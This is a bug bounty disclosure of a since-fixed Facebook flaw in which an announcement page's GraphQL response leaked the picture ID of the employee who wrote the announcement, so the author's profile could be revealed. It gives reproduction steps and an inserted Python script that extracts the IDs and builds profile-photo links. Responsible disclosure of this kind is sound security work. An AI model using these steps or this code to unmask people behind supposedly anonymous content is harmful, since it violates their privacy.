Disclose the FB profile of Facebook employees who create official announcement messages (Bug Bounty)
The vulnerability could have let a malicious user reveal the profile picture and the FB profile of the Facebook employees who create official announcement messages, which are supposed to be displayed to users as coming from Facebook rather than from a named individual.
Everything started when I received a notification regarding a Facebook Bug Bounty Program Announcement.
By checking the HTTP history in Burp, I noticed that a GraphQL request was triggered while browsing the announcement page.
By analyzing the response of this request, I found a field named “creator_profile_pic_uri” that returned a URL containing a picture ID:
I copied the picture ID from that link and inserted it into the following URL: https://www.facebook.com/photo?fbid=X
The profile picture and FB profile of the Facebook employee who created the announcement were displayed.
1) Send a POST request to https://www.facebook.com/api/graphql/ with the CSRF parameters and the following parameters in the request body:
(where X is the ID of the Facebook announcement message)
2) Search for “creator_profile_pic_uri” in the returned GraphQL response.
3) Grab the picture ID from creator_profile_pic_uri and insert it into the following URL: https://www.facebook.com/photo?fbid=Y (where Y is the picture ID)
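The response-side half of steps 2 and 3, as an added example that is not part of the original write-up: given a captured GraphQL response body (the request parameters are not reproduced on this page, so the script starts from the body you would copy out of Burp), it locates every creator_profile_pic_uri field at any depth, pulls the picture ID out of the CDN URL and builds the photo permalink. The sample response, the CDN host and all numeric IDs are constructed; the CDN filename layout (photo ID as the middle number) and the handling of a "for (;;);" prefix are assumptions of this example, not statements from the write-up.

```python
import json
import posixpath
import re
from typing import Any, Iterator, List, Optional
from urllib.parse import urlsplit

# Constructed sample response. Only the field name "creator_profile_pic_uri"
# comes from the write-up; the surrounding GraphQL structure, the CDN host and
# every numeric ID below are invented for this example.
SAMPLE_RESPONSE = json.dumps({
    "data": {
        "node": {
            "__typename": "AnnouncementMessage",
            "id": "1000000000000001",
            "title": "Facebook Bug Bounty Program Announcement",
            "creator_profile_pic_uri": (
                "https://scontent.example-cdn.net/v/t1.0-1/"
                "100000000_20000000000000002_3000000000000000003_n.jpg"
                "?oh=abc123&oe=DEF456"
            ),
        }
    }
})

# Some Facebook endpoints prefix JSON with this anti-JSON-hijacking guard;
# stripping it when present is harmless if the endpoint does not use it.
JSON_HIJACK_PREFIX = "for (;;);"

# Assumed CDN filename layout: <a>_<photo id>_<b>_<size>.jpg, with the photo ID
# (the value usable as fbid=) in the middle. This layout is an assumption of
# this example, not something the write-up states.
CDN_FILENAME_RE = re.compile(r"^(\d+)_(\d+)_(\d+)_[a-z]\.jpe?g$", re.IGNORECASE)


def parse_graphql_body(body: str) -> Any:
    """Parse a raw GraphQL response body into Python objects."""
    if body.startswith(JSON_HIJACK_PREFIX):
        body = body[len(JSON_HIJACK_PREFIX):]
    return json.loads(body)


def find_key(obj: Any, key: str) -> Iterator[Any]:
    """Yield every value stored under `key`, at any depth, in dicts/lists."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == key:
                yield v
            yield from find_key(v, key)
    elif isinstance(obj, list):
        for item in obj:
            yield from find_key(item, key)


def extract_picture_id(uri: str) -> Optional[str]:
    """Return the photo ID embedded in a CDN picture URL, or None if absent."""
    filename = posixpath.basename(urlsplit(uri).path)
    match = CDN_FILENAME_RE.match(filename)
    return match.group(2) if match else None


def photo_url(picture_id: str) -> str:
    """Build the permalink from the write-up for a given picture ID."""
    return f"https://www.facebook.com/photo?fbid={picture_id}"


def creator_photo_urls(body: str) -> List[str]:
    """End-to-end: response body -> photo permalinks for every creator found."""
    data = parse_graphql_body(body)
    urls = []
    for uri in find_key(data, "creator_profile_pic_uri"):
        if not isinstance(uri, str):
            continue
        picture_id = extract_picture_id(uri)
        if picture_id is not None:
            urls.append(photo_url(picture_id))
    return urls


if __name__ == "__main__":
    for url in creator_photo_urls(SAMPLE_RESPONSE):
        print(url)
```

In practice you would replace SAMPLE_RESPONSE with the body copied from the Burp response; the recursive search matters because the field sits inside nested nodes whose exact path varies between GraphQL queries, and the regex is deliberately strict so that avatar or placeholder images without an embedded ID are skipped rather than turned into bogus permalinks.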
January 8, 2021: Reported
January 8, 2021: Acknowledged by Facebook
January 14, 2021: Fixed by Facebook
February 1, 2021: $XXXX Bounty awarded by Facebook.